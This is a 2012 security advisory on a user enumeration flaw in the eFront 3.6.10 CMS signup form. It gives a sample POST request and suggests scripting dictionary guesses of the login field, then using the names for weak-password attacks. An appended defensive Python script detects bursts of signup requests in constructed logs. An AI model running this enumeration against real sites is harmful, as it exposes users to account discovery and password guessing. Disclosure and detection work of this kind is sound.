[ TITLE ....... ][ eFront 3.6.10 CMS user enumeration attack
[ DATE ........ ][ 11.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.efrontlearning.net
[ VERSION ..... ][ 3.6.10
[ TESTED ON ... ][ LAMP
[ -----------------------------------------------------------------------
[
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?

This is a very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

This is a user enumeration bug. At (3) You'll see how to enumerate all usernames registered on an eFront WWW.

[--------------------------------------------[
[ 3. Where is bug :)

So check it out: the part of eFront vulnerable to this attack is 'Signup'.

How to get the names: go to http://efront/www/index.php?ctg=signup
There You'll have the 'New user account' tab.

Now what is important: to find out if user-A is registered, simply write his ('potential' - could be from dictionary.txt, sure ;)) username and watch the error message in the response. In the request itself it looks like this:

---cut from Burp---
POST /www/NEW/efront/www/index.php?ctg=signup HTTP/1.1
Host: localhost
(...)
Referer: http://localhost/www/NEW/efront/www/index.php?ctg=signup
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

_qf__signup_register_personal_form= .....     <-- leave it, no matter
&login=admin ..............                   <-- this is Your input*, see below
&password=allowed .........................   <-- leave it, no matter
&passrepeat=allowed .........................  <-- leave it, no matter
&email=allowed%40allowed.com ................  <-- ...
&firstName=allowed .........................   <-- ...
&lastName=allowed .........................    <-- ...
&comments=allowed .........................    <-- ...
&submit_register=Register ...................  <-- ...
---cut from Burp---

*input - this ($login) could be a nice parameter to build a simple bash/python/php/whatever script to enumerate all users from the CMS in a few minutes.

What else, and so what? Usernames can be used to determine 'weak passwords' or any other convention for 'creating usernames/passwords' (for example: john01, john02:pass123, etc...)

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.efrontlearning.net
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;) ]
[ Best regards [
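A defender-side counterpart to the request above, added here and not part of the original advisory: a small Python detector that flags client IPs firing many POSTs at index.php?ctg=signup within a short sliding window, run over a constructed sample of Apache-style access-log lines (the IPs, timestamps and thresholds are made up for the example; the request path is the one from the advisory).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined-log style line; fields after the status code are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
SIGNUP_MARKER = "ctg=signup"  # eFront signup controller named in the advisory


def find_signup_bursts(lines, threshold=10, window_seconds=60):
    """Return {ip: peak_count} for client IPs that POST the signup form at
    least `threshold` times within any sliding window of `window_seconds`.
    A real visitor submits the form once or twice; a dictionary script feeding
    the `login` field submits it once per candidate name. Lines are assumed
    to be in chronological order, as a normal access log is."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent signup POSTs
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or SIGNUP_MARKER not in m["path"]:
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:   # evict hits that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged


def constructed_log():
    """Constructed sample (not real data): 10.0.0.5 fires 15 signup POSTs in
    30 s; 192.168.1.20 loads the form, registers once, then browses on."""
    base = datetime(2012, 4, 11, 10, 0, 0)
    fmt = '{ip} - - [{ts} +0200] "{m} /www/index.php?{q} HTTP/1.1" 200 5120'
    stamp = lambda s: (base + timedelta(seconds=s)).strftime("%d/%b/%Y:%H:%M:%S")
    lines = [fmt.format(ip="10.0.0.5", ts=stamp(2 * i), m="POST", q="ctg=signup")
             for i in range(15)]
    lines.append(fmt.format(ip="192.168.1.20", ts=stamp(0), m="GET", q="ctg=signup"))
    lines.append(fmt.format(ip="192.168.1.20", ts=stamp(45), m="POST", q="ctg=signup"))
    lines.append(fmt.format(ip="192.168.1.20", ts=stamp(50), m="GET", q="ctg=lessons"))
    return sorted(lines, key=lambda l: l.split("[")[1])


if __name__ == "__main__":
    print(find_signup_bursts(constructed_log()))   # {'10.0.0.5': 15}
```

The threshold and window are tuning knobs; a login-field value is not visible in access logs, so the detector keys on request rate per source rather than on the names tried.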